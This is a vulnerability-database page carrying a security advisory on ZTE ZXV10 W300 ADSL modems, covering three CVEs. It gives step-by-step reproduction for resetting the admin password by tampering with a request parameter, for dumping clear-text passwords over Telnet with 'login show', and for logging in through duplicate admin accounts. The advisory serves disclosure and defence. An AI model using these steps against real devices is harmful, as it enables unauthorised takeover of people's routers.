Vulners
Lucene search
ZTE ADSL Authorization Bypass / Information Disclosure
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities | 20 Nov 201500:00 | – | zdt |
 | ZTE ADSL ZXV10 W300 Password Interception Vulnerability | 25 Aug 201700:00 | – | cnvd |
| ZTE ADSL ZXV10 W300 Information Disclosure Vulnerability (CNVD-2017-28178) | 25 Aug 201700:00 | – | cnvd |
| ZTE ADSL ZXV10 W300 Information Disclosure Vulnerability | 25 Aug 201700:00 | – | cnvd |
 | CVE-2015-7257 | 24 Aug 201720:00 | – | cve |
| CVE-2015-7258 | 24 Aug 201720:00 | – | cve |
| CVE-2015-7259 | 24 Aug 201720:00 | – | cve |
 | CVE-2015-7257 | 24 Aug 201720:00 | – | cvelist |
| CVE-2015-7258 | 24 Aug 201720:00 | – | cvelist |
| CVE-2015-7259 | 24 Aug 201720:00 | – | cvelist |
10
`*ZTE ADSL modems - Multiple vulnerabilities*
Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*CVE-ID*: CVE-2015-7258
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
*CVE-ID*: CVE-2015-7259
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
Best Regards,
Karn Ganeshen
--
Best Regards,
Karn Ganeshen
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Nov 2015 00:00Current
8.2High risk
Vulners AI Score8.2
EPSS0.33338